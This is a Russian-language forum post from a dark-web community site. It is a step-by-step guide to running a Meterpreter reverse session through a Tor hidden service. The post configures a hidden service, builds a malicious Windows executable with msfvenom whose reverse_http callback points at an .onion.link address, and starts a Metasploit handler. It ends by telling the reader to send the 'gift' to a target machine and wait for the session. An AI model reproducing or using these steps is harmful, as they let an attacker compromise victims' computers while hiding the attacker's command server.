Meterpreter через TOR [Простое решение]

  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

Morty

VIP

Morty

VIP
26 Окт 2017
537
113
Наткнулся на интересную статью, тут не нашёл решил продублировать, источник указа в конце поста.

Эта тема для тех кто искал но не находил решение вопроса - а как же пустить сессию meterpreter через сеть тор

Требования:
  • Metasploit
  • tor (Expert Bundle)
  • Созданный сайт в сети tor
  • Не много терпения и капельку мозгов
Устанавливаем Metasploit если его еще нет!
Скачиваем tor:
[SRC]
apt install tor
[/SRC]

Заходим в файл конфигурации "torrc":

[SRC]
nano /etc/tor/torrc
[/SRC]
Находим и раскомментируем строчки до вида:
[SRC]
HiddenServiceDir /var/lib/tor/hidden_service/
HiddenServicePort 80 127.0.0.1:9999
[/SRC]
Перезапускаем сервис:

[SRC]
sudo service tor restartsudo service tor restart
[/SRC]
Узнаем полученный домен:
[SRC]
sudo cat /var/lib/tor/hidden_service/hostname
[/SRC]

Я думаю что для многих понятно что этим мы создали свой сайт в сети tor.

Теперь перейдем к metasploit'у.
Создадим наш вредоносный полезный файл:
[SRC]
msfvenom -p windows/meterpreter/reverse_http LHOST=*******************.onion.link LPORT=80 -o payload.exe -f exe
[/SRC]
Вместо звёздочек вводим полученную нами .onion ссылку.
Важно что бы ссылка заканчивалась на .onion.link

.onion.link - этот сайт перебрасывает вас в сеть тор без дополнительного ПО

Запустим слушателя:
[SRC]
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_http
set LHOST 192.168.1.1 (Не обязательно что будет такой же )
set LPORT 9999
exploit
[/SRC]
Отправляем наш подарок на машину и ждем сессию.

Надеюсь что тема хоть кому нибудь пригодиться)
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2022

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя